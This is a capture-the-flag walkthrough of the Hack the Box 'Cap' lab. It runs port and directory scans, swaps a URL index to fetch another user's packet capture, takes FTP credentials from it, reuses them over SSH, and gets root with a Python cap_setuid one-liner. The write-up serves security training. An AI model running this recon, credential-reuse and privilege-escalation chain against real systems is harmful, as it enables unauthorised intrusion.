Cap Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.10.245
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.245:21
Open 10.10.10.245:22
Open 10.10.10.245:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 21,22,80 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 05:49 PDT
Initiating Ping Scan at 05:49
Scanning 10.10.10.245 [4 ports]
Completed Ping Scan at 05:49, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:49
Completed Parallel DNS resolution of 1 host. at 05:49, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:49
Scanning 10.10.10.245 [3 ports]
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245
Completed SYN Stealth Scan at 05:49, 0.27s elapsed (3 total ports)
Nmap scan report for 10.10.10.245
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-10-14 05:49:03 PDT for 1s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
Raw packets sent: 7 (284B) | Rcvd: 6 (240B)It looks like there a few ports open that I might want to test. But first its best to see where the IP address leads.
Press enter or click to view image in full size
It seems to be an exposed security dashboard. Not good. Lets quickly run a feroxbuster scan and see what else I can find.
┌──(zero㉿zero)-[~]
└─$ feroxbuster -u http://10.10.10.245 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.245
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 4l 34w 232c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 4l 24w 208c http://10.10.10.245/data => http://10.10.10.245/
200 GET 227l 442w 7119c http://10.10.10.245/static/js/scripts.js
200 GET 5l 79w 2509c http://10.10.10.245/static/css/slicknav.min.css
200 GET 6l 16w 1718c http://10.10.10.245/static/images/author/avatar.png
200 GET 33l 160w 3547c http://10.10.10.245/static/js/plugins.js
200 GET 6l 102w 8420c http://10.10.10.245/static/js/jquery.slicknav.min.js
200 GET 132l 301w 3121c http://10.10.10.245/static/css/metisMenu.css
200 GET 10l 75w 4963c http://10.10.10.245/static/js/metisMenu.min.js
200 GET 472l 659w 5835c http://10.10.10.245/static/css/default-css.css
200 GET 151l 244w 2095c http://10.10.10.245/static/css/typography.css
200 GET 6l 64w 2936c http://10.10.10.245/static/css/owl.carousel.min.css
200 GET 16l 58w 4724c http://10.10.10.245/static/js/jquery.slimscroll.min.js
200 GET 496l 2420w 33784c http://10.10.10.245/netstat
200 GET 4l 320w 15514c http://10.10.10.245/static/js/vendor/modernizr-2.8.3.min.js
200 GET 1081l 1807w 16450c http://10.10.10.245/static/css/themify-icons.css
200 GET 5l 351w 19191c http://10.10.10.245/static/js/popper.min.js
200 GET 432l 975w 12757c http://10.10.10.245/static/js/pie-chart.js
200 GET 862l 1800w 17885c http://10.10.10.245/static/css/responsive.css
200 GET 4l 66w 29062c http://10.10.10.245/static/css/font-awesome.min.css
200 GET 354l 1049w 17369c http://10.10.10.245/ip
200 GET 2261l 5128w 65419c http://10.10.10.245/static/js/line-chart.js
200 GET 7l 279w 42766c http://10.10.10.245/static/js/owl.carousel.min.js
200 GET 2837l 5376w 53428c http://10.10.10.245/static/css/styles.css
200 GET 4l 1338w 85578c http://10.10.10.245/static/js/vendor/jquery-2.2.4.min.js
200 GET 7l 567w 48944c http://10.10.10.245/static/js/bootstrap.min.js
200 GET 7l 1513w 144877c http://10.10.10.245/static/css/bootstrap.min.css
302 GET 4l 24w 220c http://10.10.10.245/capture => http://10.10.10.245/data/1
200 GET 389l 1065w 19386c http://10.10.10.245/
302 GET 4l 24w 208c http://10.10.10.245/data/2 => http://10.10.10.245/
[####################] - 2m 62322/62322 0s found:29 errors:22
[####################] - 2m 62282/62282 509/s http://10.10.10.245/ Nothing that immediately stands out was revealed, most of the URLs link to pages I can already access. So its time to try and poke around and see what the open ports can provide.
I then started to try and connect to the FTP to see if there was an anonymous login I could use.
┌──(zero㉿zero)-[~]
└─$ ftp 10.10.10.245:21
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
331 Please specify the password.Interestingly enough, there was a version number for the FTP server. A quick Google for exploits sadly resulted in nothing other than a way to DDoS attack it. (CVE-2021–30047).
After looking around a few of the pages I noticed there was a file avaliable to download, a pcap file to be exact.
Press enter or click to view image in full size
Initially it didn’t result in too much, but the URL of the webpage made it seem like there could be additional pages of data hidden from view. If there was a data set 1, maybe there were more?
http://10.10.10.245/data/12, 3 and 4 didn’t result in anything. But 0 did.
Press enter or click to view image in full size
There were now values associated with the Data Types. Time to download this new pcap file and see what I could find!
Press enter or click to view image in full size
Perfect, this file contains a ton of information that I can scan through and fine something to help me get a foothold. After a brief search I discovered someone was trying to log into that FTP server that I was unable to get access too before.
36 4.126500 192.168.196.1 192.168.196.16 FTP 69 Request: USER nathan
40 5.424998 192.168.196.1 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!A user named nathan with the password clearly written below it. Success.
After trying to log into the FTP server several times, using different parameters it seems to always kick me out. I am not sure why, so my next thought was to try and login to the SSH with the same credentials, since some users foolishly use the same login for everything.
┌──(zero㉿zero)-[~]
└─$ ssh nathan@10.10.10.245
nathan@10.10.10.245's password:
Permission denied, please try again.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Oct 14 14:26:30 UTC 2024
System load: 0.48 Processes: 226
Usage of /: 36.7% of 8.73GB Users logged in: 0
Memory usage: 22% IPv4 address for eth0: 10.10.10.245
Swap usage: 0%
=> There are 4 zombie processes.
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu May 27 11:21:27 2021 from
nathan@cap:~$Turns out they do use the same password. And now I have the user flag!
Privilege escalation
Now to try and get the root flag! First I am going to upload and run LinPEAS to try and find an vulnerabilities that could lead me to getting root access.
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eipAfter running LinPEAS on the target system, it found a vulnerability which we could use to get root access. It looks like a misconfigured python3.8 binary is present. After some research its very apparent that python3.8 binary having cap_setuid capabilities assigned to it means it can be used to manipulate its own process ID to maintain privileged access.
nathan@cap:~$ /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami
root After gaining root access I got the flag to finish the box! Its pretty important to make sure your binaries aren’t misconfigured, allowing for this type of privilege escalation.
Last updated